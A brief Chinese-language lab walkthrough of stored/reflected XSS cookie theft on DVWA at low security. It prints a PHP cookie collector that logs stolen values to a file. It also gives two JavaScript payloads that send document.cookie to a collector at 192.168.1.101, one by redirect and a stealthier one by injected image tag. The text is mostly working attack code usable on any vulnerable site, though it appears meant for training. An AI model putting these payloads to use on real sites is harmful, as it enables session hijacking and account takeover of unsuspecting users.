实验环境:DVWA
实验步骤:
一、在服务器创建一个1.php文件获取cookie值,并将cookie值写入1.txt中
php代码如下:
<?php
$file=fopen("1.txt","a");
if($_GET['cookie']){
$cookie=$_GET['cookie'];
fputs($file,"$cookie\r\n");
}
?>二、构造url,当用户打开url时自动将其本地cookie发送到1.txt中
三、将代码和本地cookie进行拼接
代码如下:
<script>document.location='http://192.168.1.101/xss/1.php?cookie='+document.cookie;</script>四、打开DVWA(选择低级别)执行代码,结果如下:
上述代码会将用户访问的页面跳转到空白页,太明显,所以可将代码插入到图片标签中
代码如下:
<script>document.body.innerHTML+="<img src='http://192.168.1.101/xss/1.php?cookie="+document.cookie+"'>";</script>结果如下:
